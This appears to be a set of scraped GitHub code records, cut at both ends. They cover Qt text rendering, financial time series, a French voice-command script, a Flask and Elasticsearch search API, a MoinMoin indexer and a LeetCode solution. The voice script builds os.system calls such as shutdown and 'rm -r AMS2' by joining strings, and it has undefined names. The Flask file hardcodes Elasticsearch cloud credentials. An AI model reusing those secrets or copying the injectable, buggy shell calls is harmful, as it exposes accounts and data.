y)\n if self.stroke > 0:\n outliner = QtGui.QPainterPathStroker()\n outliner.setWidth(self.stroke)\n path = QtGui.QPainterPath()\n if self.fontStyle == 6:\n # PathStroker ignores smallcaps so we need this weird hack\n path.addText(x, y, font, self.title[0])\n fm = QtGui.QFontMetrics(font)\n newX = x + fm.width(self.title[0])\n strokeFont = self.page.fontComboBox_titleFont.currentFont()\n strokeFont.setCapitalization(QFont.SmallCaps)\n strokeFont.setPixelSize(int((self.fontSize / 7) * 5))\n strokeFont.setLetterSpacing(QFont.PercentageSpacing, 139)\n path.addText(newX, y, strokeFont, self.title[1:])\n else:\n path.addText(x, y, font, self.title)\n path = outliner.createStroke(path)\n image.setPen(QtCore.Qt.NoPen)\n image.setBrush(PaintColor(*self.strokeColor))\n image.drawPath(path)\n\n image.setFont(font)\n image.setPen(self.textColor)\n image.drawText(x, y, self.title)\n\n # turn QImage into Pillow frame\n frame = image.finalize()\n if self.shadow:\n shadImg = ImageEnhance.Contrast(frame).enhance(0.0)\n shadImg = shadImg.filter(ImageFilter.GaussianBlur(self.shadBlur))\n shadImg = ImageChops.offset(shadImg, self.shadX, self.shadY)\n shadImg.paste(frame, box=(0, 0), mask=frame)\n frame = shadImg\n\n return frame\n\n def commandHelp(self):\n print('Enter a string to use as centred white text:')\n print(' \"title=User Error\"')\n print('Specify a text color:\\n color=255,255,255')\n print('Set custom x, y position:\\n x=500 y=500')\n\n def command(self, arg):\n if '=' in arg:\n key, arg = arg.split('=', 1)\n if key == 'color':\n self.page.lineEdit_textColor.setText(arg)\n return\n elif key == 'size':\n self.page.spinBox_fontSize.setValue(int(arg))\n return\n elif key == 'x':\n self.page.spinBox_xTextAlign.setValue(int(arg))\n return\n elif key == 'y':\n self.page.spinBox_yTextAlign.setValue(int(arg))\n return\n elif key == 'title':\n self.page.lineEdit_title.setText(arg)\n return\n super().command(arg)\n","repo_name":"djfun/audio-visualizer-python","sub_path":"src/components/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":7754,"program_lang":"python","lang":"en","doc_type":"code","stars":223,"dataset":"github-code","pt":"22"} +{"seq_id":"12048830514","text":"# -*- coding: utf-8 -*-\n#import matplotlib\n\n###### IMPORTANT !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \n## Si devolvemos algun self.XXXX, devolver un copy.deepcopy()\nimport numpy as np\nimport copy\nimport time\nimport pandas as pd\nimport graph_lib as gr\nimport Intraday_lib as itd\nimport utilities_lib as ul\nimport indicators_lib as indl\nimport get_data_lib as gdl \nimport basicMathlib as bMl\n\nimport datetime as dt\nfrom datetime import datetime\n\n\"\"\"\nLibrary with all the obtaining indicator functions of the market.\n\n\"\"\"\n\n# Start Date is the date from which we return the data.\n# The data returned should be returned after this date.\n\n# TimeSeries is the main data we have to care about. \n# All the operations will be done over this one\n\ndef set_period (self, period):\n # Sets the period date in minuts\n self.period = period \n \ndef get_period (self):\n return copy.deepcopy(self.period);\n\ndef set_seriesNames(self, seriesNames = []):\n if (seriesNames == []):\n seriesNames = [\"Close\"]\n \n self.seriesNames = seriesNames;\n self.timeSeries = [];\n \ndef get_seriesNames(self):\n return copy.deepcopy(self.seriesNames);\n\ndef set_interval(self,start_time = [], end_time = []):\n \n if (len(self.TD) != 0): # If the csv is not empty we fill it with the max\n if (start_time == []):\n self.start_time = self.TD.index[0]\n if (end_time == []):\n self.end_time = self.TD.index[-1] \n \n if (start_time != []):\n self.start_time = start_time\n if (end_time != []):\n self.end_time = end_time\n \n ## If both start and end are set we then calculate the mask !!!\n if ((self.start_time != [])& (self.end_time != [])):\n dates = self.TD.index\n self.time_mask = (dates >= self.start_time) & (dates <= self.end_time)\n \n# print len(dates)\n# print len(self.time_mask)\n\ndef get_timeSeries(self, seriesNames = [], transform = \"log\"):\n # The final timeSeries will be [Nsamples][Nsec]\n # TODO : Make it possible to add other names that will be a funciton of the original prices\n \n transform = \"pene\"\n if (seriesNames != []): # If we indicate a new type of seriesNames\n self.set_seriesNames(seriesNames)\n \n timeSeries = []\n for name in self.seriesNames:\n if (name == \"Average\"):\n timeSeries.append(np.mean(self.TD[[\"Low\",\"High\",\"Close\",\"Open\"]], axis = 1))\n \n elif(name == \"RangeHL\"): # Difference Between High and Low\n Range = np.array(self.TD[\"High\"][:] - self.TD[\"Low\"][:])\n timeSeries.append(Range)\n \n elif(name == \"RangeCO\"): # Difference between Close and Open\n Range = self.TD[\"Close\"][:] - self.TD[\"Open\"][:]\n timeSeries.append(Range)\n \n elif(name == \"magicDelta\"): # Difference between Close and Open\n magicDelta = self.get_magicDelta()\n timeSeries.append(magicDelta)\n \n else:\n timeSeries.append(self.TD[name])\n \n timeSeries = np.array(timeSeries).T; # timeSeries[Nvalues][Ntimes]\n dates = self.TD.index\n\n# print timeSeries.shape\n self.timeSeries = timeSeries[self.time_mask,:] # Price List we are operating with timeSeries[Nvalues][Ndates]\n # TODO if we convert dates to np.array it converts dt.datetime to np.datetime64\n self.dates = dates[self.time_mask] # Dates we are operating with \n# print timeSeries.shape\n if (transform == \"log\"):\n self.timeSeries = np.log(self.timeSeries)\n \n return copy.deepcopy(self.timeSeries)\n\ndef get_dates(self):\n # Gets the dates vector, if we dont have it, we create it\n# if (len(self.dates) == 0): # Check existence of timeSeries\n dates = self.TD.index[self.time_mask]\n self.dates = dates\n return copy.deepcopy(self.dates)\n\n\ndef get_timeSeriesReturn(self, transform = \"log\"):\n # Gets the Return of the Time Series, if it has not been created yet, then it creates it\n # if (self.timeSeries == []): # Check existence of timeSeries\n transform = \"pene\"\n # We will try as well to get the return of the first datapoint\n # if we actually have it in the database. For this, we check our mask.\n # If the first \"1\" found is not at 0, we can do this\n \n self.get_timeSeries(transform = \"tus muertos\")\n \n pos1 = (self.time_mask).tolist().index(1)\n\n if (pos1 > 0): # If we actually have more signal.\n ps = self.TD[self.seriesNames].iloc[pos1-1]\n ps = np.array(ps).T\n ps = ps.reshape(ps.size/len(self.seriesNames), len(self.seriesNames))\n# print ps\n# print self.timeSeries.shape\n# print ps.shape\n self.timeSeriesReturn = bMl.get_return(np.concatenate((ps,self.timeSeries),axis =0))\n self.timeSeriesReturn = self.timeSeriesReturn[1:,:]\n else:\n self.timeSeriesReturn = bMl.get_return(self.timeSeries)\n \n if (transform == \"log\"):\n ## We perform log of this shit + 1 to get the log returns\n self.timeSeriesReturn = np.log(self.timeSeriesReturn + 1)\n \n return copy.deepcopy(self.timeSeriesReturn)\n\ndef get_timeSeriesCumReturn(self):\n # Gets the Return of the Time Series, if it has not been created yet, then it creates it\n #if (self.timeSeries == []): # Check existence of timeSeries\n self.get_timeSeries()\n \n self.timeSeriesCumReturn = bMl.get_cumReturn(self.timeSeries)\n return copy.deepcopy(self.timeSeriesCumReturn)\n\n# The rest of functions supose that the timeSeries has been created.\n#### GET ONLY DAILY SHIT\n\ndef get_SortinoR(self):\n # if (self.timeSeriesReturn == []):\n self.get_timeSeriesReturn();\n \n SortinoR = ul.get_SortinoR(self.timeSeriesReturn)\n \n return SortinoR;\n \ndef get_SharpR(self):\n # if (self.timeSeriesReturn == []):\n self.get_timeSeriesReturn();\n \n self.get_SharpR = ul.get_SharpR(self.timeSeriesReturn)\n return copy.deepcopy(self.get_SharpR)\n \n##################################################################\n###################### DIFERENCES DATA ######################\n##################################################################\n\"\"\" Here we define other time series obtained from linear operations\nover the basic ones\"\"\"\n\ndef get_magicDelta(self):\n # Difference between the open of one day and the close of the preceiding day\n closePrev = self.TD[\"Close\"].values\n openCurr = self.TD[\"Open\"].values\n\n magicDelta = np.array(openCurr[1:] - closePrev[:-1])\n magicDelta = np.concatenate(([0],magicDelta), axis = 0)\n# print magicDelta\n# print len(openCurr[1:])\n# print (magicDelta.shape)\n \n return magicDelta\n\ndef get_diffPrevCloseCurrMax(self):\n \n # Difference between the open of one day and the close of the preceiding day\n PrevClose = self.TD[\"Close\"].values\n CurrMax = self.TD[\"High\"].values\n\n diffPrevCloseCurrMax = np.array(PrevClose[1:] - CurrMax[:-1]).reshape((len(PrevClose)-1,1))\n zero_vec = np.zeros((1,1)) # Add zero vector\n diffPrevCloseCurrMax = np.concatenate((zero_vec,diffPrevCloseCurrMax), axis = 0)\n \n return copy.deepcopy(diffPrevCloseCurrMax[self.time_mask,:])\n\ndef get_diffPrevCloseCurrMin(self):\n \n # Difference between the open of one day and the close of the preceiding day\n PrevClose = self.TD[\"Close\"].values\n CurrMin = self.TD[\"Low\"].values\n\n# print len(PrevClose)\n diffPrevCloseCurrMin = np.array(PrevClose[1:] - CurrMin[:-1]).reshape((len(PrevClose)-1,1))\n zero_vec = np.zeros((1,1)) # Add zero vector\n# print diffPrevCloseCurrMin.shape\n diffPrevCloseCurrMin = np.concatenate((zero_vec,diffPrevCloseCurrMin), axis = 0)\n \n return copy.deepcopy(diffPrevCloseCurrMin[self.time_mask,:])\n \n#### GET the time series divided in days #####\ndef get_intra_by_days(self):\n if (self.timeSeries == []): # Check existence of timeSeries\n self.get_timeSeries()\n \n days_list_price = [];\n days_list_dates = [];\n \n price = self.timeSeries\n dates = self.dates\n\n# print type(dates[0])\n days_dates = ul.get_dates(dates)\n diff_days = np.unique(days_dates)\n \n for day_i in range (len(diff_days)):\n \n day_intra_indx = (days_dates == diff_days[day_i])\n day_intra_price = price[day_intra_indx,:]\n day_intra_date = dates[day_intra_indx]\n \n days_list_price.append(day_intra_price)\n days_list_dates.append(day_intra_date)\n \n return days_list_price, days_list_dates\n \n","repo_name":"manuwhs/Financial-Engineering-DTU","sub_path":"code/CTimeData/TimeData_core.py","file_name":"TimeData_core.py","file_ext":"py","file_size_in_byte":8576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74790652216","text":"\"\"\"L'idee de ce projet se repose sur quatre etapes:\n\n1. Recevoir une commande vocale et la subdiviser en tranches de mots(Donnees chronologiques);\n\n2. Traiter chaque tranche pour obtenir son evolution chronologique: determiner les caracteristiques de chaque tranche (Tt,St et Rt);\n\n3. Reconstruire la phrase de l'auteur, sous format texte,(en effectuant une recherche des caracteristiques de chaque mot dans notre liste de mots pre-entraines)\n\n4. Executer la commande emise par l'expression de l'auteur.\n\nNB: Vu l'envergure de la partie execution des commandes, nous nous somme limite a un certain nombre de commande: eteindre un ordinateur, ouvrir un logiciel a travers son nom, ecrire un texte en format txt ou word, lancer des requetes sur le navigateur web, creer, ouvrir, modifier ou supprimer un dossier ou un fichier. \n\"\"\"\n\nimport nltk\nnltk.download('punkt')\nimport os\nimport time\n#import pygame.mixer ou\nfrom playsound import playsound\nfrom gtts import gTTS\nimport webbrowser\nfrom tkinter import messagebox\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport statsmodels.api as sm\nfrom scipy import interpolate\n\n#Le receuille du son, etant pas facile surtout a temps reel, essayon d'utiliser un mot a l'exemple(eteindre)\n#eteindre.txt est un dataframe correspondant a notre serie\n\n#Tableu des valeurs de la serie(DataFrame)\ndef coordonnees(mot):\n et=open(mot)\n data=et.read()\n data=data[27:].replace(\",\",\".\")\n D=data.split()\n t=[]\n X=[]\n for i in range(0,len(D)-1,2):\n t.append(float(D[i]))\n X.append(abs(float(D[i+1])))\n Y=[]\n for i in range(len(t)):\n Y.append([t[i],X[i]])\n dta=pd.DataFrame(Y,columns=['co1','co2'])\n return dta\n \nmot='spectre.txt'\ndta=coordonnees(mot)\n\nTable=(list(dta.co1),list(dta.co2))\n\n\n#Creation/Lecture d'une expression\ndef sonn(my_text,t):\n language=('fr')\n fich=\"audio\"+str(t)+\".mp3\"\n my_audio=gTTS(text=my_text,lang=language,slow=False)\n my_audio.save(fich)\n playsound(fich)\n #ou:\n #pygame.mixer.init()\n #pygame.mixer.music.load(fich)\n #pygame.mixer.music.play()\n #time.sleep(6)\n\n#Etrainement de la lecture des mots\n\ndef dict_entrainement_mots():\n f=open('liste_francais.txt','r')\n tex=f.read()\n mots=tex.split()\n d={}\n for i in mots:\n sonn(i,0)\n song=i+\".mp3\"\n songg=song+'.txt'\n dta=coordonnees(songg)\n dta.co2.interpolate(inplace=True)\n res = sm.tsa.seasonal_decompose(dta.co2,period = 30)\n #dec est constitue de 3 colones dataframe: tendence,saison,residu\n d[i]=dec\n return d\n\n#Cette etape ne necessite qu'une seul execution\nglobal dict_mots_pre_entraine\ndict_mots_pre_entraine=dict_entrainement_mots()\n\n#Recevoir et subdiviser un son: 1ere etatpe\n\n#Division en tranche\n\ndef divise_mots(table):\n lm=[]\n t=table[0]\n X=table[1]\n pos=0\n for i in range(len(t)):\n while i0.001:\n i+=1\n m=(t[pos:i],X[pos:i])\n lm.append(m)\n pos=i\n return lm\n\nlist_mots=divise_mots(Table) \n\n#Caracterisation des mots de l'auteur: 2eme etape\n\ndef dict_caracterisation_mot(list_mots):\n \n ide=0 #identite des mot\n dict_mots={}\n for mot in list_mots:\n dta.co2.interpolate(inplace=True)\n res = sm.tsa.seasonal_decompose(dta.co2,period = 30)\n #dec est constitue de 3 listes: tendence,saison,residu\n dict_mots[ide]=res\n ide+=1 \n return dict_mots\n\n\ndict_mots=dict_caracterisation_mot(list_mots)\nprint(dict_mots)\n\n#Reconstitution de l'expression d'auteur: 3eme etape\ndef reconstitu_com(dict_mots):\n command=\"\"\n \n for mot in dict_mots.values():\n \n for m_pre in dict_mots_pre_entraine.values():\n a=b=c=False\n #test pour la tendance \n #chercher l'erreur entre chaque mot de commande avec chaque mot du dictionnair pre_entraine\n erreur=[list(mot.trend)[i]-list(m_pre.trend)[i] for i in range(min(len(mot.trend),len(m_pre.trend)))]\n #faire un test de significativite sur la variable erreur, au niveau 95% soit alpha=5%\n #Ceci permet de verifier que l'erreur est presque constante, donc les deux courbes sont presque paralleles\n if scipy.stats.ttest_rel([i for i in range(len(erreur))], erreur)[1]>=0.05:\n a=True\n \n #On fait pareil pour la saison et le residu\n erreur=[list(mot.seasonal)[i]-list(m_pre.seasonal)[i] for i in range(min(len(mot.seasonal),len(m_pre.seasonal)))]\n if scipy.stats.ttest_rel([i for i in range(len(erreur))], erreur)[1]>=0.05:\n b=True\n\n erreur=[list(mot.resid)[i]-list(m_pre.resid)[i] for i in range(min(len(mot.resid),len(m_pre.resid)))]\n if scipy.stats.ttest_rel([i for i in range(len(erreur))], erreur)[1]>=0.05:\n c=True\n\n if a and b and c:\n command+=list(dict_mots_pre_entraine.keys())[list(dict_mots_pre_entraine.values()).index(m_pre)]\n return command\n\nCommand=reconstitu_com(dict_mots)\n\n#Ex: Command=\"eteindre mon odinateur!\"\n\n#Classe des executions possibles\nclass execution_com:\n\n def __init__(self):\n self.action=\"\"\n self.nom=\"\"\n\n def eteindre(self):\n my_text0=\"Voulez vous eteindre votre ordinateur?\"\n sonn(my_text0,0)\n choice=messagebox.askyesno(\"Eteindre?\",\"Voudriez vous eteindre le PC?\")\n if choice==True:\n my_text1=\"D'accord. Veillez patienter!\"\n sonn(my_text1,1)\n try:\n os.system(\"shutdown\")\n except: \n my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n else:\n my_text2=\"Ah! J'allait vous dire que vous allez me manquer enormement monsieur Abdoul Madjid.\"\n sonn(my_text2,2)\n exit()\n \n \n def creer_dossier(self):\n my_text0=\"Voulez vous creer un dossier \"+self.nom+\"?\"\n sonn(my_text0,0)\n choice=messagebox.askyesno(\"Creer?\",\"Voudriez vous creer le nouveau dossier\"+self.nom+\"?\")\n if choice==True:\n my_text1=\"D'accord. A votre service!\"\n sonn(my_text1,1)\n act=self.action+self.nom\n try:\n os.system(act)\n except: \n my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n else:\n my_text2=\"Ok, comme vous voudriez monsieur Abdoul Madjid.\"\n sonn(my_text2,2)\n exit()\n \n \n \n def ouvre_dossier(self):\n my_text0=\"Voulez vous ouvrir le dossier \"+self.nom+\"?\"\n sonn(my_text0,0)\n choice=messagebox.askyesno(\"Voulez vous ouvrir le dossier \"+self.nom+\"?\")\n if choice==True:\n my_text1=\"D'accord. A votre service!\"\n sonn(my_text1,1)\n act=self.action+self.nom\n try:\n os.system(act)\n except: \n my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n else:\n my_text2=\"Ok, comme vous voudriez monsieur Abdoul Madjid.\"\n sonn(my_text2,2)\n exit()\n \n def modif_dossier(self):\n my_text0=\"Voulez vous modifier le dossier \"+self.nom+\"?\"\n sonn(my_text0,0)\n choice=messagebox.askyesno(\"Voulez vous modifier le dossier \"+self.nom+\"?\")\n if choice==True:\n my_text1=\"D'accord. A votre service!\"\n sonn(my_text1,1)\n act=self.action+self.nom\n try:\n os.system(act)\n except: \n my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n else:\n my_text2=\"Ok, comme vous voudriez monsieur Abdoul Madjid.\"\n sonn(my_text2,2)\n exit()\n \n def suppri_fich(self):\n my_text0=\"Voulez vous supprimer le dossier \"+self.nom+\"?\"\n sonn(my_text0,0)\n choice=messagebox.askyesno(\"Voulez vous supprimer le dossier \"+self.nom+\"?\")\n if choice==True:\n my_text1=\"D'accord. A votre service!\"\n sonn(my_text1,1)\n act=self.action+self.nom\n try:\n os.system(act)\n except: \n my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n else:\n my_text2=\"Ok, comme vous voudriez monsieur Abdoul Madjid.\"\n sonn(my_text2,2)\n exit()\n \n def requete_web(self):\n my_text0=\"Voulez vous consulter la page \"+self.nom+\"?\"\n sonn(my_text0,0)\n choice=messagebox.askyesno(\"Voulez vous consulter la page \"+self.nom+\"?\")\n if choice==True:\n my_text1=\"D'accord. A votre service!\"\n sonn(my_text1,1)\n try:\n webbrowser.open(self.nom)\n except: \n my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n else:\n my_text2=\"Ok, comme vous voudriez monsieur Abdoul Madjid.\"\n sonn(my_text2,2)\n exit()\n \n\n def editer_text(self):\n my_text0=\"Voulez vous editer un fichier nomme \"+self.action+\"?\"\n sonn(my_text0,0)\n choice=messagebox.askyesno(\"Voulez vous editer un fichier nomme \"+self.action+\"?\")\n if choice==True:\n my_text1=\"D'accord. A votre service!\"\n sonn(my_text1,1)\n try:\n fich=self.action+\".txt\"\n f=open(fich,'a')\n f.write(self.nom)\n f.close()\n except: \n my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n else:\n my_text2=\"Ok, comme vous voudriez monsieur Abdoul Madjid.\"\n sonn(my_text2,2)\n exit()\n \n\n def executer(self):\n my_text0=\"Voulez vous Executer \"+self.action+\"?\"\n sonn(my_text0,0)\n choice=messagebox.askyesno(\"Voulez vous executer \"+self.action+\"?\")\n if choice==True:\n my_text1=\"D'accord. A votre service!\"\n sonn(my_text1,1)\n act=self.action\n try:\n os.system(act)\n except: \n my_text=\"Oups, une erreur s'est produite. Veiller le faire manuellement!\"\n else:\n my_text2=\"Ok, comme vous voudriez monsieur Abdoul Madjid.\"\n sonn(my_text2,2)\n exit()\n \n#Traitement de l'expression de l'auteur et execution de la commande: Etape 4\ndef action(Command):\n command=Command.split()\n command=set(command)\n ex=execution_com()\n\n eteindre={\"eteindre\",\"eteins\",\"t'etindre\",\"d'eteindre\",\"eteind\"}\n ouvre={\"ouvre\",\"ouvrir\",\"ouverture\"}\n executer={\"executer\",\"execute\",\"execution\"}\n supprime={\"supprimer\",\"supprime\",\"effacer\",\"efface\"}\n recherche={\"rechercher\",\"recherche\",\"requete\",\"chercher\",\"cherche\"}\n creer={\"creer\",\"cree\"}\n modifier={\"modifier\",\"modifie\",\"changer\",\"change\"}\n editer={\"editer\",\"ecrire\",\"rediger\",\"edite\",\"ecris\",\"redige\"}\n \n if len(command.intersection(eteindre))!=0:\n ex.eteindre()\n if len(command.intersection(ouvre))!=0:\n ex.action=\"nautilus \"\n ex.nom=\"AMS2\"\n ex.ouvre_dossier()\n if len(command.intersection(executer))!=0:\n ex.action=\"google-chrome\"\n ex.executer()\n if len(command.intersection(supprime))!=0:\n ex.action=\"rm -r \"\n ex.nom=\"AMS2\"\n ex.suppri_fich()\n if len(command.intersection(recherche))!=0:\n ex.nom=\"https://www.google.com/\"\n ex.requete_web()\n if len(command.intersection(creer))!=0:\n ex.action=\"mkdir \"\n ex.nom=\"AMS1\"\n ex.creer_dossier()\n if len(command.intersection(modifier))!=0:\n ex.action=\"mv \"\n ex.nom=\"AMS1 AMS2\"\n ex.modif_dossier()\n if len(command.intersection(editer))!=0:\n ex.nom=\"Bonjour et bienvenu!\"\n ex.action=\"salut\"\n ex.editer_text() \n \naction(Command)\ntry:\n os.system(\"rm audio0.mp3 audio1.mp3 audio2.mp3\")\nexcept:\n os.system(\"rm audio2.mp3\")\n","repo_name":"amsanoussi/commande_vocale","sub_path":"command_time_series.py","file_name":"command_time_series.py","file_ext":"py","file_size_in_byte":12135,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28869343938","text":"class Ponto:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def imprimirValores(self):\n print(f'X: {self.x}')\n print(f'Y: {self.y}')\n\nclass Retângulo:\n def __init__(self, largura, altura):\n self.largura = largura\n self.altura = altura\n\n def encontrarCentro(self):\n Xmeio = (A.x + B.x) / 2\n Ymeio = (A.y + B.y) / 2\n print(f'Xmeio = {Xmeio}')\n print(f'Ymeio = {Ymeio}')\n\n\ndef cor(string, azul=False, vermelho=False):\n if vermelho == True:\n print(f'\\033[1;31m{string}\\033[m')\n elif azul == True:\n print(f'\\033[1;34m{string}\\033[m')\n else:\n print(f'\\033[1;36m{string}\\033[m')\n\ndef menu():\n print('-' * 40)\n cor('[1]Alterar valores do retângulo', azul=True)\n cor('[2]Mostrar as coordenadas', azul=True)\n cor('[3]Calcular o centro do retângulo', azul=True)\n cor('[4]Sair do programa', azul=True)\n opção = int(input('Opção: '))\n if opção == 1:\n ax = int(input('Digite a coordenada x do canto inferior esquerdo: '))\n A.x = ax\n ay = int(input('Digite a coordenada y do canto inferior esquerdo: '))\n A.y = ay\n bx = int(input('Digite a coordenada x do canto superior direito: '))\n B.x = bx\n by = int(input('Digite a coordenada y do canto superior direito: '))\n B.y = by\n r1.largura = A\n r1.altura = B\n menu()\n elif opção == 2:\n print('Ponto inferior esquerdo')\n A.imprimirValores()\n print('Ponto superior direito')\n B.imprimirValores()\n continuar = input('Pressione Enter para continuar ')\n menu()\n elif opção == 3:\n r1.encontrarCentro()\n continuar = input('Pressione Enter para continuar ')\n menu()\n elif opção == 4:\n print('-'*40)\n cor('Até logo!')\n\n##-----------------------------------------------------------------------\nax = int(input('Digite a coordenada x do canto inferior esquerdo: '))\nay = int(input('Digite a coordenada y do canto inferior esquerdo: '))\nbx = int(input('Digite a coordenada x do canto superior direito: '))\nby = int(input('Digite a coordenada y do canto superior direito: '))\nA = Ponto(ax, ay)\nB = Ponto(bx, by)\nr1 = Retângulo(A, B)\nmenu()","repo_name":"Nilsonsantos-s/Praticando","sub_path":"Python/Python Brasil (SITE)/Programação Orientada a Objetos (POO)/Classe Ponto e Retângulo/Classe Ponto e Retângulo.py","file_name":"Classe Ponto e Retângulo.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"} +{"seq_id":"9926888487","text":"from flask import Flask ,request , jsonify\nfrom elasticsearch import Elasticsearch\nimport pandas as pd\nimport json\nimport os\napp=Flask(__name__)\n\n# Create the client instance\n\n#es = Elasticsearch(hosts=[\"http://localhost:9200\"])\nes = Elasticsearch(\n cloud_id='5c3d8718e4c04ecfa161f13670f71f55:dXMtY2VudHJhbDEuZ2NwLmNsb3VkLmVzLmlvOjQ0MyQ2OTBhN2E0NjZmODA0MzhkOTYwOGQ4N2MwNzk1NTkxYSRlMzgyY2NlMmNlYzQ0ZWZiYmM3MGQ3MDNlMWJlYTk2Yw==',\n basic_auth=(\"elastic\", \"XIHCX7seGgbtin4bDUg8InVJ\")\n)\n## THIS IS THE OCE TO CREATE INDEX IN THE ELASTC SEARCH AND LOAD THE DATA IN IT\n\nindex_name = 'article_index' # Choose a suitable index name\n\n# mapping = {\n# 'properties': {\n# 'article_id': {'type': 'text'},\n# 'article_name': {'type': 'text'}\n# }\n# }\n\n# es.indices.create(index=index_name, ignore=400)\n# es.indices.put_mapping(index=index_name, body=mapping)\n\ndef index_product(article_id, article_name):\n document = {\n 'article_id': article_id,\n 'article_name': article_name\n }\n es.index(index=index_name, body=document, id=article_id)\n\narticles = [\n \"Introduction to Python Programming\",\n \"Building RESTful APIs with Flask\",\n \"Data Structures and Algorithms in C++\",\n \"Machine Learning Fundamentals with Scikit-Learn\",\n \"Web Development with JavaScript and React\",\n \"Creating a Responsive Design with CSS Grid\",\n \"Debugging Techniques for Software Developers\",\n \"An Introduction to Git and GitHub Workflow\",\n \"Securing Your Web Applications: Best Practices\",\n \"Diving into Docker: Containerization Simplified\",\n \"Building a RESTful API with Node.js and Express\",\n \"Machine Learning Models for Image Recognition\",\n \"Exploring the World of Blockchain Technology\",\n \"Introduction to Cybersecurity and Ethical Hacking\",\n \"Effective Database Management with SQL\",\n \"Python Data Visualization with Matplotlib\",\n \"Full-Stack Development with MERN Stack\",\n \"Automating Tasks with Python Scripts\",\n \"Data Science: Exploring Pandas and NumPy\",\n \"Machine Learning in Healthcare: Applications and Challenges\",\n \"JavaScript Frameworks: React vs. Angular vs. Vue.js\",\n \"Mastering REST API Authentication\",\n \"Scaling Microservices with Kubernetes\",\n \"Software Testing Best Practices\",\n \"The Power of Functional Programming in JavaScript\",\n \"Web Security: Protecting Against Common Attacks\",\n \"Introduction to DevOps: Principles and Tools\",\n \"Creating Your First Mobile App with React Native\",\n \"Quantum Computing: The Future of Information Processing\",\n \"Exploring the Internet of Things (IoT) Development\"\n]\n\n# for i in range(len(articles)):\n# index_product(i,articles[i])\n\n\n@app.route('/search', methods=['POST'])\ndef search():\n req=request.get_json()\n data=req[\"keyword\"].lower()\n body = {\n 'query': {\n 'wildcard': {\n 'article_name': {\n 'value': '*' + data + '*',\n 'boost': 1.0,\n 'case_insensitive': True\n }\n }\n }\n }\n response = es.search(index=index_name, body=body)\n hits = response['hits']['hits']\n print(hits)\n products=[]\n ids=[]\n for hit in hits:\n\n products.append(hit['_source']['article_name'])\n ids.append(hit['_source']['article_id'])\n d = pd.DataFrame({'articles': products, 'article_id': ids})\n data = d.to_dict(orient='records')\n\n # Convert the data to JSON\n json_data = json.dumps(data)\n return json_data\n\n\n@app.route('/add-article-elastic-search',methods=[\"POST\"])\ndef add():\n \n req=request.get_json()\n title=req[\"title\"]\n article_id=req[\"article_id\"]\n try:\n index_product(article_id, title)\n return \"success\"\n except :\n return \"error in adding title to elastic search\"\n\n@app.route('/delete-article-elastic-search',methods=[\"POST\"])\ndef delete():\n req=request.get_json()\n article_name=req[\"article_name\"]\n body = {\n 'query': {\n 'match': {\n 'article_name': article_name\n }\n }\n }\n response = es.search(index=index_name, body=body)\n hits = response['hits']['hits']\n doc_id = hits[0]['_id']\n try:\n es.delete(index=index_name, id=doc_id)\n return \"success\"\n except:\n return \"error in deleting article from elastic search\"\n\n \n\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\",port=int(\"8000\"),debug=True)","repo_name":"Cherit007/MindScribe","sub_path":"AI/search-engine/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32515434580","text":"import os\n\nfrom MoinMoin.script import _util\nfrom MoinMoin.script._util import MoinScript\nfrom MoinMoin.request import RequestCLI\nfrom MoinMoin.lupy import Index\n\n\nclass IndexScript(MoinScript):\n \"\"\" Lupy general index script class \"\"\"\n\n def __init__(self, argv, def_values):\n MoinScript.__init__(self, argv, def_values)\n self.parser.add_option(\n \"--files\", metavar=\"FILES\", dest=\"file_list\",\n help=\"filename of file list, e.g. files.lst (one file per line)\"\n )\n self.parser.add_option(\n \"--update\", action=\"store_true\", dest=\"update\",\n help=\"when given, update an existing index\"\n )\n \n def mainloop(self):\n self.init_request()\n # Do we have additional files to index?\n if self.options.file_list:\n self.files = file(self.options.file_list)\n else:\n self.files = None\n self.command()\n\nclass PluginScript(IndexScript):\n \"\"\" Lupy index build script class \"\"\"\n\n def command(self):\n Index(self.request).indexPages(self.files, self.options.update)\n #Index(self.request).test(self.request)\n\n \n","repo_name":"imosts/flume","sub_path":"moin/lib/python2.4/site-packages/MoinMoin/script/lupy/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"13139378120","text":"# https://leetcode.com/problems/hand-of-straights/\n\"\"\"\nDiscription of question in above link\n\"\"\"\n\n\ndef isNStraightHand(hand, W):\n\n if len(hand) % W != 0:\n return False\n\n x = {}\n for el in hand:\n if x.__contains__(el):\n x[el] += 1\n else:\n x[el] = 1\n\n keys = list(x.keys())\n keys.sort()\n\n while(keys and len(keys) > 0):\n min = keys[0]\n\n for i in range(min, min + W):\n if (not x.__contains__(i)):\n return False\n if x[i] == 1:\n x.pop(i)\n keys.remove(i)\n else:\n x[i] -= 1\n\n return True\n\n\n# Driver program to test the above function\n\n\ndef main():\n hand = [1, 2, 3, 6, 2, 3, 4, 7, 8]\n W = 3\n print(isNStraightHand(hand, W))\n\n\nif __name__ == \"__main__\":\n 